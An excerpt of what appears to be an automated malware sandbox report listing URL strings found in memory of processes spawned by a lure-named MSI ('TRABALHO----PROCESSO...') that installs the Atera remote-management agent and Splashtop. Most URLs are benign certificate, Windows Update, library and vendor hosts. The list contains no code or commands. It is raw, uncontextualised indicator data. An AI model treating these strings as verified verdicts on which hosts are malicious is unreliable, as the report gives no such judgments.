                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E741015000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A2D1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A200000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlile
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlc
                                Source: AteraAgent.exe, 00000010.00000002.1916974804.000002347668E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                Source: AteraAgent.exe, 00000010.00000002.1916974804.000002347668E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?be39b22
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabb2p:
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d17kmd0va0f0mp.cloudfront.net
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d25btwd9wax8gu.cloudfront.net
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.16.drString found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.splashtop.com
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://download.sysinternals.com/Files/SysinternalsSuite.zip
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://download.sysinternals.com/Files/SysinternalsSuitex64.zip
                                Source: AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://learn-powershell.net/2013/02/08/powershell-and-events-object-events/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2265471511.00000213B38B2000.00000002.00000001.01000000.0000003F.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://mirrors.kernel.org/sourceware/cygwin/
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.splashtop.com
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/dummynamespace/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/3
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/5
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/T
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://nsis.sourceforge.net/Docs/AppendixD.html
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digice
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEsd=
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E741015000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A2D1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BCC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924832428.0000023477CF4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BC0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1585649904.000001FD5A0C8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1583936197.0000026AEAC45000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A200000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, Pubnub.dll0.2.dr, System.Threading.Tasks.dll.26.dr, Atera.AgentPackages.CommonLib.dll2.26.dr, System.Dynamic.Runtime.dll.26.dr, System.ValueTuple.dll.16.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0K
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0N
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477540000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055ADA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0015E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00162000.00000004.00000800.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msiString found in binary or memory: http://ocsp.digicert.com0X
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A5E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                                Source: AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlP
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0013B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://packagesstore.blob.core.windows.net
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://poshcode.org/2513
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://poshcode.org/417
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://powershell.com/cs/blogs/tips/archive/2009/02/05/validating-a-url.aspx
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882192000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://pwnt.co
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://rawcdn.githack.com/
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.00000248459E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s-part-0044.t-0009.fb-t-msedge.net
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12D40000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somehwere/something.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere.com/downloads/Install-WindowsImage.ps1
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere.com/downloads/Install-WindowsImagex64.ps1
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere123zzaafasd.invalid
